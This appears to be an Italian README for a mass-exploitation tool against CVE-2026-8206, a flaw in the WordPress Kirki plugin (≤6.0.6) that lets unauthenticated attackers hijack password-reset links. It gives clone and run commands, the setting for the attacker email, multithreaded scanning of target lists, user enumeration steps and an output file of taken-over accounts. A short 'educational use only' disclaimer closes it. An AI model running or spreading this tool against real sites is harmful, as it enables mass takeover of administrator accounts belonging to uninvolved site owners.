
Strumento di sfruttamento di massa per CVE-2026-8206 – Escalation dei privilegi non autenticata tramite 'handle_forgot_password' nel plugin WordPress Kirki (≤6.0.6).
Strumento di sfruttamento di massa per CVE-2026-8206 – una vulnerabilità critica nel plugin Kirki WordPress (versioni ≤ 6.0.6) che consente a un attaccante non autenticato di dirottare i link di reset della password e di assumere il controllo di qualsiasi account utente, inclusi gli amministratori.
Il plugin Kirki espone un endpoint REST non autenticato (/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password). A causa della mancanza di controlli dei permessi e di una validazione email impropria, un attaccante può:
Versioni affette: ≤ 6.0.6
Versione corretta: 6.0.7
readme.txt e kirki.min.css (supporta sia le cartelle kirki che kirki-test)/wp-json/wp/v2/users (fallback su admin)requestsconcurrent.futures (backport, solitamente installato)Installa le dipendenze:
pip install requests futures
git clone https://github.com/Jenderal92/CVE-2026-8206.git
cd CVE-2026-8206
Modifica lo script per impostare la tua email di attaccante:
ATTACKER_EMAIL = "[email protected]" # riga ~15
python CVE-2026-8206.py <file_target> [thread]
<file_target> – file di testo con un dominio per riga (con o senza http:///https://)[thread] – opzionale, numero di thread concorrenti (default: 15)python CVE-2026-8206.py targets.txt 20
targets.txt)example.com
https://sito-vulnerabile.com
http://127.0.0.1/wordpress
res.txt – contiene i target sfruttati con successo nel formato:
URL|username|email_attaccante|reset_link_inviato_a_email_attaccante
Esempio:
https://example.com|admin|[email protected]|reset_link_inviato_a_email_attaccante
Output della console che mostra lo stato in tempo reale:
/wp-content/plugins/{kirki,kirki-test}/readme.txt (Stable tag) e /.../kirki.min.css (parametro ver). Se la versione è ≤ 6.0.6, procedi./wp-json/wp/v2/users, se vuoto, fallback su admin.username = username targetemail = email dell'attaccanteemailBody = JSON che include il chip reset_link200 e "Email sent", il target viene scritto in res.txt.Questo software è fornito solo per scopi educativi e di test di sicurezza autorizzati. L'uso non autorizzato contro sistemi che non possiedi o per i quali non hai il permesso di testare è illegale. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.
Per maggiori informazioni, consulta il disclaimer sulla copertina di Jenderal92. Puoi verificarlo QUI !!!